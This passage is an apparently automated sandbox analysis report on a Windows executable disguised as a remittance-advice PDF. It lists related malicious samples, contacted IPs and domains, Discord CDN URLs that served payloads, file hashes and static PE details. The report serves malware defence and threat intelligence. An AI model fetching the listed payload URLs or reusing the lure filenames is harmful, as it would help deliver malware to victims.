                                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      18:50:26API Interceptor2x Sleep call for process: Remittance Advice pdf.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      162.159.130.233SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                      P20200107.DOCGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                      FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
                                                      SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                      SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                      G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                      Marking Machine 30W Specification.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                      2021 RFQ Products Required.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                                                      Company Reference1.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                                                      PAY SLIP.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                                      part1.rtfGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      parkingpage.namecheap.comd801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      MRQUolkoK7.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      REVISED PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                      • 198.54.117.217
                                                      z5Wqivscwd.exeGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      register.jpg.dllGet hashmaliciousBrowse
                                                      • 198.54.117.217
                                                      24032130395451.pdf .exeGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      PO17439.exeGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      pdf Re revised PI 900tons.exeGet hashmaliciousBrowse
                                                      • 198.54.117.216
                                                      YJgdGYWCni.exeGet hashmaliciousBrowse
                                                      • 198.54.117.211
                                                      Passport_ID_jpg.exeGet hashmaliciousBrowse
                                                      • 198.54.117.211
                                                      Taekwang Quote - 210421_001.exeGet hashmaliciousBrowse
                                                      • 198.54.117.211
                                                      Ac5RA9R99F.exeGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      1400000004-arrival.exeGet hashmaliciousBrowse
                                                      • 198.54.117.211
                                                      qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                      • 198.54.117.217
                                                      uNttFPI36y.exeGet hashmaliciousBrowse
                                                      • 198.54.117.216
                                                      dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                      • 198.54.117.210
                                                      PO#293701 pdf.exeGet hashmaliciousBrowse
                                                      • 198.54.117.217
                                                      PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                      • 198.54.117.210
                                                      cdn.discordapp.com0d69e4f6_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      6de2089f_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      Almadeena-Bakery-005445536555665445.scr.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      To1sRo1E8P.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      wNgiGmsOwT.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      BhTxt5BUvy.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      rSYbV3jx0K.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      04282021.DOC.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      P20200107.DOCGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      New order.04272021.DOC.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      Payment-Confirmation_Copy.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      Q264003.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Camscanner.New Order.09878766.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      doc07621220210416113300.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      REF # 166060421.docGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      File Attached.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      CLOUDFLARENETUSYeni sipari#U015f _WJO-001, pdf.exeGet hashmaliciousBrowse
                                                      • 104.21.19.200
                                                      Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 172.67.151.10
                                                      Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      5c542bb5_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 104.21.84.93
                                                      6a9b0000.da.dllGet hashmaliciousBrowse
                                                      • 104.20.184.68
                                                      6ba90000.da.dllGet hashmaliciousBrowse
                                                      • 104.20.184.68
                                                      5c542bb5_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 104.21.84.93
                                                      s.dllGet hashmaliciousBrowse
                                                      • 104.20.185.68
                                                      setup-lightshot.exeGet hashmaliciousBrowse
                                                      • 104.23.139.12
                                                      s.dllGet hashmaliciousBrowse
                                                      • 104.20.185.68
                                                      74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Bank payment return x.exeGet hashmaliciousBrowse
                                                      • 104.21.19.200
                                                      471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                                                      • 104.22.1.232
                                                      SecuriteInfo.com.Trojan.GenericKD.36812138.16843.exeGet hashmaliciousBrowse
                                                      • 104.21.19.200
                                                      a4.dllGet hashmaliciousBrowse
                                                      • 104.20.184.68
                                                      LAjei2S8bg.exeGet hashmaliciousBrowse
                                                      • 104.21.19.200
                                                      HFTeISi0wZQeZi6.exeGet hashmaliciousBrowse
                                                      • 104.21.19.200
                                                      don.exeGet hashmaliciousBrowse
                                                      • 172.67.218.244
                                                      8a793b14_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 104.18.24.31
                                                      QEpa8OLm9Z.exeGet hashmaliciousBrowse
                                                      • 172.67.188.154
                                                      BODIS-NJUSMRQUolkoK7.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      100005111.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      PaymentAdvice.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      raw.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      HbnmVuxDIc.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      NEW ORDER INQUIRY_B3003H24 .pdf.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      RFQ_R4100131210.pdf.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      7665585857.docxGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      9JFrEPf5w7.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      RFQ-14042021 Guangzhou Haotian Equipment Technology Co., Ltd,pdf.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      OrSxEMsYDA.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      swift note.xlsxGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      Swift002.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      Statement Of account.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      RFQ_AP65425652_032421 isu-isu,pdf.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      LWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      RCS76393.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      PaymentAdvice.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153
                                                      0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                      • 199.59.242.153

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19#U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Tree Top.htmlGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      PT6-1152.docGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      s.dllGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      setup-lightshot.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      s.dllGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      8a793b14_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      pic05678063.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      6de2089f_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      e17486cd_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Almadeena-Bakery-005445536555665445.scr.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Purchase Order comfirmation to issue INVOICE.htmlGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      jX16Cu330u.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      5jHZqgYHCZ.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      z3LOkpYy4s.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      dl6jAtWJeR.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      YVNw1T4L7m.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      QsO4ETjF7s.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                      • 162.159.130.233

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\Rvxegpaadtlzpxdmcufyegvoybvpuiv[1]
                                                      Process:C:\Users\user\Desktop\Remittance Advice pdf.exe
                                                      File Type:data
                                                      Category:downloaded
                                                      Size (bytes):421376
                                                      Entropy (8bit):6.987505387736667
                                                      Encrypted:false
                                                      SSDEEP:12288:YTJtLo39BtGicUxJMM1Men1Dv4m7GorQV:YTJCWnM1Zn1DEKy
                                                      MD5:C38C0EE55D473984E6DDE723FC21D34E
                                                      SHA1:EA1E7F1920E49B5255A0725ABB390D19457C08CA
                                                      SHA-256:403437C085886D18DA75BD5CCEF68B6428DEE165D8290C5514E5451AC398EA0C
                                                      SHA-512:A1A4597C95DA8D8F127ABE984D28890E7F0A0F4916535C0AC47A99B764AE1E900443617831AA828FC2969756BF74C26D00C85103F9303E53B7C8F7BF3FAAB51F
                                                      Malicious:false
                                                      Reputation:low
                                                      IE Cache URL:https://cdn.discordapp.com/attachments/831802482459672609/838794174521933834/Rvxegpaadtlzpxdmcufyegvoybvpuiv
                                                      Preview: .cecccgc.c..cc.ccccccc.c}cccccccccccccccccccccccccccccccccc.cc.scq...j....j...................................m..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc..cc..ic....ccccccccCc.>..e.c..ccq.cccccS..ccsccc.ccc.ccsccceccgcccccccgcccccccc.iccgccccccec.cccccccccccsccsccccccsccccccccccccS.c..ccc.gc..ecccccccccccccccccccgc..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc...cccc?..ccsccc..ccgcccccccccccccc.cc...ccccs.ecc.cc.ecc.ccccccccccccc.cc#...cccccr.cccC.cccccc%.cccccccccccccccc#......cc..cccS.ccqccc%.ccccccccccccc.cc#......cc..ccccgcc.ccc3.ccccccccccccc.cc......ccc..ecc.gcc.eccO.ccccccccccccc.cc.ccccccccccccc.gcccccccgccccccccccccc.cc.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):6.594037642420053
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.66%
                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                      • Windows Screen Saver (13104/52) 0.13%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      File name:Remittance Advice pdf.exe
                                                      File size:771072
                                                      MD5:f597d74f90311fa86a708b211892d76f
                                                      SHA1:2d8f68efc677df2b2958e5631bffaf610a5661ab
                                                      SHA256:84d44657f148197e79e253ab0b50cdd8003e2b760318f9ab760b47fe4e25a594
                                                      SHA512:f541bfd4e0a0566002bd1e18d5b43d20a2452099e23e2f0f5e64202e2bad1317bb3aa51eca005908314bb49eee6074b8ae09c58006ec1c134c7b218a5e6f312e
                                                      SSDEEP:12288:qjG2QEEsadOoRzP6nIHNFfHH3tmDJP2uU/Oy/e/:qK2adO0zznPXIPRUD/M
                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                      File Icon

                                                      Icon Hash:b464e4d0f0d8cc60

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x471704
                                                      Entrypoint Section:CODE
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                      DLL Characteristics:
                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:831fc92f23cd73751a129066fe55905a

                                                      Entrypoint Preview

                                                      Instruction
                                                      push ebp
                                                      mov ebp, esp
                                                      add esp, FFFFFFF0h
                                                      mov eax, 004714CCh
                                                      call 00007F9F889D7779h
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      mov eax, dword ptr [00473A14h]
                                                      mov eax, dword ptr [eax]
                                                      call 00007F9F88A27DC9h
                                                      mov ecx, dword ptr [00473914h]
                                                      mov eax, dword ptr [00473A14h]
                                                      mov eax, dword ptr [eax]
                                                      mov edx, dword ptr [00471080h]
                                                      call 00007F9F88A27DC9h
                                                      mov eax, dword ptr [00473A14h]
                                                      mov eax, dword ptr [eax]
                                                      mov byte ptr [eax+5Bh], 00000000h
                                                      mov eax, dword ptr [00473A14h]
                                                      mov eax, dword ptr [eax]
                                                      call 00007F9F88A27E32h
                                                      call 00007F9F889D53C1h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x750000x22d2.idata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x403c1.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x7158.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x790000x18.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      CODE0x10000x7075c0x70800False0.528146701389data6.56315808572IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      DATA0x720000x1bac0x1c00False0.460658482143data4.68674643107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      BSS0x740000xd750x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      .idata0x750000x22d20x2400False0.358615451389data4.8136915441IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      .tls0x780000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      .rdata0x790000x180x200False0.048828125data0.20058190744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                      .reloc0x7a0000x71580x7200False0.615748355263data6.66854412504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                      .rsrc0x820000x403c10x40400False0.327726015321data5.48503294472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_CURSOR0x828880x134data
                                                      RT_CURSOR0x829bc0x134data
                                                      RT_CURSOR0x82af00x134data
                                                      RT_CURSOR0x82c240x134data
                                                      RT_CURSOR0x82d580x134data
                                                      RT_CURSOR0x82e8c0x134data
                                                      RT_CURSOR0x82fc00x134data
                                                      RT_ICON0x830f40x94a8dataEnglishUnited States
                                                      RT_DIALOG0x8c59c0x52data
                                                      RT_STRING0x8c5f00x318data
                                                      RT_STRING0x8c9080x1ccdata
                                                      RT_STRING0x8cad40x188data
                                                      RT_STRING0x8cc5c0x1b0data
                                                      RT_STRING0x8ce0c0x298data
                                                      RT_STRING0x8d0a40xe8data
                                                      RT_STRING0x8d18c0x128data
                                                      RT_STRING0x8d2b40x2b8data
                                                      RT_STRING0x8d56c0x3f8data
                                                      RT_STRING0x8d9640x360data
                                                      RT_STRING0x8dcc40x3e8data
                                                      RT_STRING0x8e0ac0x234data
                                                      RT_STRING0x8e2e00xecdata
                                                      RT_STRING0x8e3cc0x1b4data
                                                      RT_STRING0x8e5800x3e4data
                                                      RT_STRING0x8e9640x358data
                                                      RT_STRING0x8ecbc0x2b4data
                                                      RT_RCDATA0x8ef700x10data
                                                      RT_RCDATA0x8ef800x2c67bPC bitmap, Windows 3.x format, 225 x 225 x 4EnglishUnited States
                                                      RT_RCDATA0xbb5fc0x761Delphi compiled form 'T__2631768680'
                                                      RT_RCDATA0xbbd600x5d59Delphi compiled form 'T__2632699841'
                                                      RT_GROUP_CURSOR0xc1abc0x14Lotus unknown worksheet or configuration, revision 0x1
                                                      RT_GROUP_CURSOR0xc1ad00x14Lotus unknown worksheet or configuration, revision 0x1
                                                      RT_GROUP_CURSOR0xc1ae40x14Lotus unknown worksheet or configuration, revision 0x1
                                                      RT_GROUP_CURSOR0xc1af80x14Lotus unknown worksheet or configuration, revision 0x1
                                                      RT_GROUP_CURSOR0xc1b0c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                      RT_GROUP_CURSOR0xc1b200x14Lotus unknown worksheet or configuration, revision 0x1
                                                      RT_GROUP_CURSOR0xc1b340x14Lotus unknown worksheet or configuration, revision 0x1
                                                      RT_GROUP_ICON0xc1b480x14dataEnglishUnited States
                                                      RT_MANIFEST0xc1b5c0x865XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                                                      Imports

                                                      DLLImport
                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                      kernel32.dlllstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                      gdi32.dllUnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
